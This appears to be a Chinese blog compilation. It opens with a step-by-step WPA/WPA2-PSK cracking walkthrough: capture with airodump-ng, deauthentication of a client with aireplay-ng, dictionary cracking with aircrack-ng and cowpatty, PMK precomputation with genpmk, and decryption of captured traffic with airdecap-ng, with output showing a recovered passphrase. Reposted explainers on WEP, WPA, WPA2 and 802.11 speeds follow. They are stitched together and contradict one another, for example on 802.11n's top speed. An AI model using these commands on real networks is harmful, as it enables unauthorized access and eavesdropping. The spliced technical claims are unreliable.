文章目录
综述
WPA加密方式分析
密码字典攻击
破解WPA-PSK
wireshark
cowpatty
加快WPA/WPA2 PSK
加快速度
解密WPA数据包

综述
WPA主要采用的是 临时密钥完整性协议(TKIP) 加密算法，TKIP 旨在改进WEP,且无需依赖全新硬件来运行;WPA2则强制使用AES-CCMP算法来进行加密，比TKIP更强大、更坚固。
WPA和WPA2支持两种身份验证机制：

基于EAP的身份验证（采用RADIUS服务器）—> 企业
基于预共享密钥（Pre-Shared Key,PSK）的身份验证—> 个人

WPA加密方式分析
WPA/WPA2 PSK极易为字典密码攻击–此种攻击需要的输入:

无线客户端与AP之间的4次WPA握手信息，以及常用密码攻击字典，之后利用aircrack-ng之类的工具。

WPA/WPA2 PSK 运作方式–>利用 PSK+5个参数来生成成对的临时密钥（PTK:Pairwise Transient Key）,然后利用该密钥进行加密无线AP与申请者之间的通话信道。

网络的SSID
无线AP随机数 A-Nonce(Authenticator Nonce)
申请者随机数 S-Nonce(Supplicant Nonce)
无线AP MAC 地址
申请者MAC地址


通过wifi信道嗅探可以窃取整个会话过程中的所有5个参数，唯一不可获取的的仅为PSK

PSK生成：由用户提供的WPA-PSK密码外加SSID创建而成

WPA-PSK密码外加SSID都通过基于密码的密钥派生函数(Password-Based Key Derivation Function,PBKDF2)发送，该函数会输出一个256位的共享密钥 。

密码字典攻击
攻击者利用攻击工具外加大型的密码字典进行攻击。攻击工具会根据每个密码派生出一个256位的PSK，并用其与之前提及的其他参数来创建PTK。PTK将用来验证是否与某个握手数据包中的 消息完整性检查（Message Integrity Check, MIC）匹配。若匹配，则根据密码字典猜测的密码是正确的;若不匹配，则猜测的密码是错误的。

破解WPA-PSK

同样适用于WPA2网络

airodump wlan0mon
airodump --bsssid ap_mac -c chanel -w ~/capture/ssid wlan0mon

# deauth数据包,若命令的输出中存在与信道相关的错误信息 --ignore-negative-one
aireplay-ng -0 10 -a ap_mac -c computer_mac wlan0mon --ignore-negative-one

aircrack-ng ~/capture/ssid*.cap -w /usr/share/wordlists/rock.txt
cowpatty -f /usr/share/wordlists/rockphone.txt -r capture/fast_966e-01.cap -s FAST_966E

wireshark
wireshark中打开airodump-ng工具中捕获的数据包.cap,用过滤表达式筛选并查看与WPA 4次握手相关的数据包。

WPA握手数据包所属的协议是EAPOL


kali自带的密码字典


cowpatty
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>
cowpatty: Must supply a pcap file with -r

Usage: cowpatty [options]

	-f 	Dictionary file
	-d 	Hash file (genpmk)
	-r 	Packet capture file
	-s 	Network SSID (enclose in quotes if SSID includes spaces)
	-c 	Check for valid 4-way frames, does not crack
	-h 	Print this help information and exit
	-v 	Print verbose information (more -v for more verbosity)
	-V 	Print program version and exit

root@yue:~# cowpatty -f /usr/share/wordlists/rockphone.txt -r capture/fast_966e-01.cap -s FAST_966E
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack.  Please be patient.

The PSK is "186****1111".

1 passphrases tested in 0.01 seconds:  143.37 passphrases/second

加快WPA/WPA2 PSK

使用PSK密码及SSID，通过PBKDF2计算PSK，不但极为消耗CPU资源，而且还耗时。在输出256位PSK之前，该函数会将两者排列组合超过4096ci。下一步的破解涉及使用该密码以及四次握手中参数，并与握手中MIC进行比对验证。参数会随每次握手而异。

关键： 尽快根据密码计算PSK

通过预先计算PSK（也叫成对主密钥Pairwise Master Key:PMK）来加快破解进度
加快速度

使用genpmk工具，针对特定的SSID和wordlist预先计算PMK。

root@yue:~/Pictures# genpmk
genpmk 1.3 - WPA-PSK precomputation attack. <jwright@hasborg.com>
genpmk: Must specify a dictionary file with -f
Usage: genpmk [options]

	-f 	Dictionary file
	-d 	Output hash file
	-s 	Network SSID
	-h 	Print this help information and exit
	-v 	Print verbose information (more -v for more verbosity)
	-V 	Print program version and exit

After precomputing the hash file, run cowpatty with the -d argument.
# genpmk -f password.lst.txt -d output_pmk.lst -s ap_ssid 

生成output_pmk.lst文件

2. 利用cowpatty进行破解
# cowpatty -d out_pmk.lst -s ap_ssid -r ~/capture/ap_ssid*.cap

解密WPA数据包
root@yue:~/Pictures# airdecap-ng --help

  Airdecap-ng 1.5.2  - (C) 2006-2018 Thomas d'Otreppe
  https://www.aircrack-ng.org

  usage: airdecap-ng [options] <pcap file>

  Common options:
      -l         : don't remove the 802.11 header
      -b <bssid> : access point MAC address filter
      -e <essid> : target network SSID
      -o <fname> : output file for decrypted packets (default <src>-dec)

  WEP specific option:
      -w <key>   : target network WEP key in hex
      -c <fname> : output file for corrupted WEP packets (default <src>-bad)

  WPA specific options:
      -p <pass>  : target network WPA passphrase
      -k <pmk>   : WPA Pairwise Master Key in hex

      --help     : Displays this usage screen
root@yue:~/Pictures# airdecap-ng -p 186****1111 -e FAST_966E  ~/capture/fast_966e-01.cap 
Total number of stations seen            4
Total number of packets read         11843
Total number of WEP data packets         0
Total number of WPA data packets       906
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets       376
Number of bad TKIP (WPA) packets         0

解密后生成的文件为：
-rw-r--r--  1 root root  25250 Jan  4 20:44 fast_966e-01-dec.cap





临时密钥完整性协议(TKIP): Temporal Key Integrity Protocol ↩︎

The combination of both of these is sent through the Password-Based Key Derivation Function, which outputs the 256-bit shared key. ↩︎

目录

有线等效加密（ WEP ）

Wi-Fi 访问保护（ WPA ）

Wi-Fi 访问保护 II（ WPA2 ）

WPA-PSK/WPA2-PSK

无线网标准

有线等效加密（ WEP ）

　　有线等效保密（ WEP ）是世界上使用最广泛的 Wi-Fi 安全算法。因为历史的缘故，以及向后兼容的原因，很多路由器的控制面板中，用户会发现该算法位于加密类型选择菜单的首位。

　　WEP 于199年9月被批准作为 Wi-Fi 安全标准。即使在当时那个年代，第一版 WEP 的加密强度也不算高，因为美国对各类密码技术的限制，导致制造商仅采用了64位加密。当该限制解除时，加密强度提升至128位。尽管后来还引入了256位 WEP 加密，但128位加密仍然是最常见的加密。

　　尽管经过了修订算法，加长密钥等升级，但是随着时间的推移，人们发现了 WEP 标准的许多漏洞，随着计算能力的提高，利用难度也越来越低。早在2001年，就已经有相关漏洞的 POC 验证测试，2005年美国联邦调查局发布了公开演示（以增强人们对 WEP 标准缺陷的认识），他们使用公开的免费软件在几分钟内就破解了 WEP 的密码。

　　尽管还进行了种种改进、变通，或支撑 WEP 系统的尝试，但它仍然非常脆弱，依赖 WEP 的系统应该进行升级，如果不能进行安全升级，就更换新产品吧。 Wi-Fi 协会于2004年宣布 WEP 正式退役。

Wi-Fi 访问保护（ WPA ）

　　因为 WEP 加密标准频出漏洞， Wi-Fi 协会推出了 WPA 加密标准。该标准于2003年正式启用，正是 WEP 正式退役的前一年。 WPA 设置最普遍的是 WPA-PSK（预共享密钥），而且 WPA 使用了256位密钥，明显强于 WEP 标准中使用的64位和128位密钥。

　　WPA 标准作出了一些重大变革，其中包括消息完整性检查（确定接入点和客户端之间传输的数据包是否被攻击者捕获或改变）、临时密钥完整性协议（TKIP）。 TKIP 采用的包密钥系统，比 WEP 采用的固定密钥系统更加安全。 TKIP 协议最后被高级加密标准（AES）所取代。

　　尽管 WPA 较之于 WEP 是有了很大的改善， WPA 标准仍然不够安全。 TKIP 是 WPA 的核心组件，设计初衷是全为对现有 WEP 设备进行固件升级。因此， WPA 必须重复利用 WEP 系统中的某些元素，最终也被黑客利用。

　　与 WEP 遭遇相同，通过 POC 验证和公开演示也被证明易受攻击。有趣的是，对 WPA 的攻击过程中，通常不是直接对 WPA 算法进行攻击（虽然此类攻击已经成功），而是对 WPA 推出的一个补充系统 —— Wi-Fi保护设置（WPS）进行攻击，该设计的目的是为了方便建立连接。

Wi-Fi 访问保护 II（ WPA2 ）

　　WPA 标准于2006年正式被 WPA2 取代。 WPA 和 WPA2 之间最显着的变化之一是强制使用 AES 算法和引入 CCMP （计数器模式密码块链消息完整码协议）替代 TKIP 。

　　目前， WPA2 系统的主要安全漏洞很不起眼（漏洞利用者必须进行中间人模式攻击，从网络内部获得授权，然后延续攻击网络上的其它设备）。因此， WPA2 的已知漏洞几乎都限制在企业级网络。所以，讨论 WPA2 在家庭网络上是否安全没有实际意义。

　　不幸的是， WPA2 也有着 WPA 同样的致使弱点， Wi-Fi 保护设置（ WPS ）的攻击向量。尽管攻击WPA/WPA2保护的网络，需要使用现代计算机花费2至14小时持续攻击，但是我们必须关注这一安全问题，用户应当禁用 WPS （如果可能，应该更新固件，使设备不再支持 WPS ，由此完全消除攻击向量）。

     WPA2加密方式是目前使用最广泛的无线加密方式。

WPA-PSK/WPA2-PSK

     WPA和WPA2衍生出来的两种加密方式WPA-PSK和WPA2-PSK，他们之间的区别在于使用的加密算法。WPA-PSK和WPA2-PSK既可以使用TKIP加密算法也可以使用AES加密算法。

加密强度：WPA2-PSK AES算法  >  WPA-PSK AES算法 > WPA2-PSK TKIP算法 > WPA-PSK TKIP算法 > WEP

无线网标准

IEEE802.11标准

IEEE802.11a，速率最高可达54Mbps
	
IEEE802.11b，速率最高可达11Mbps
	
IEEE802.11g，速率最高可达54Mbps
	
IEEE802.11n，速率最高可达108Mbps
	
IEEE802.11ac，速率最高可达600Mbps
这里需要格外说明的是，不同的无线加密办法对无线网络传输速率的影响也不尽相同。因为IEEE 802.11n规范不支持以WEP加密或TKIP加密算法的高吞吐率，所以假如用户挑选了WEP加密办法或WPA-PSK/WPA2-PSK加密方法的TKIP算法，无线传输速率将会主动限制在IEEE 802.11g的水平。

也就是说，假如用户运用的是契合IEEE 802.11n规范的无线商品，那么无线加密办法只能挑选WPA-PSK/WPA2-PSK的AES算法加密，不然无线传输速率将会显着下降。而假如用户运用的是契合IEEE 802.11g规范的无线商品，那么几种加密办法都能够极好的兼容，不过我们仍然不主张挑选WEP这种较老且现已被破解的加密办法，最好能够晋级一下无线路由，挑选目前最新的无线加密方法

那么现在常用的无线加密方式都是什么呢？一般分为三种：WEP加密、WPA加密和WPA2加密。 目前WPA2是被业界认为最安全的加密方式，建议使用。而不建议选用WEP加密，因为它较其他加密方式最老，也是最不安全的加密方式。WPA加密是WEP加密的改进版，包含两种方式：预共享密钥和Radius密钥。其中预共享密钥（pre-share key缩写为PSK）有两种密码方式：TKIP和AES，相比TKIP，AES具有更好的安全系数，建议用户使用。 而WPA2加密，是WPA加密的升级版。WPA2同样也分为TKIP和AES两种方式，因此也建议选AES加密不要选TKIP。
转载于:https://www.cnblogs.com/chixiaojin/p/3541510.html

（1）WEP、WAP、WPA２加密：
	WEP 是1999年9月通过的 IEEE 802.11 标准的一部分，使用 RC4(Rivest Cipher) 串流加密技术达到机密性，并使用 CRC-32 校验和达到资料正确性。在 2001年8月，RC4加密方式被破解，WEP加密不再安全，于2003年被WPA加密所淘汰。WPA全名为Wi-Fi Protected Access，有WPA和WPA2两个标准，是一种保护无线网络（Wi-Fi）安全的系统，它是应研究者为弥补前一代加密（WEP）的几个严重的弱点而产生的。WPA是在802.11i完备之前替代WEP的过渡方案。

	WPA/WPA2有两种版本，企业版（WPA/WPA2）和个人版（WPA-PSK/WPA2-PSK）。家庭用户一般用个人版的加密方式就足够了。个人版的使用两种算法TKIP和AES，TKIP（临时密钥完整性协议）是一种旧的加密标准，本质上是一个WEP补丁。AES（高级加密标准）是一个完全独立的加密算法，远远优于任何TKIP提供的算法，安全性比 TKIP强，使用该算法的无线网络传输速率也要比TKIP更快。

	WEP加密仅支持802.11、802.11b、802.11g协议，故使用WEP加密时数据传输速率最大不超过54Mbit/s。WPA/WPA2的TKIP算法同样仅支持802.11、802.11b、802.11g，向下兼容WEP，使用该算法时数据传输速率不高于  ５４Mbit/s。WPA/WPA2的AES算法适用于802.11n无线传输协议，当使用40MHz带宽和4*MIMO时，速度最高可达600Mbit/s。

		WPA-PSK向下兼容WEP，支持TKIP算法，WPA2-PSK不兼容WEP，仅支持TKIP和AES（CCMP）算法。使用WEP或TKIP加密算法时，无线协议会自动切换到b/g低速率模式，一般情况下建议使用混合加密方式。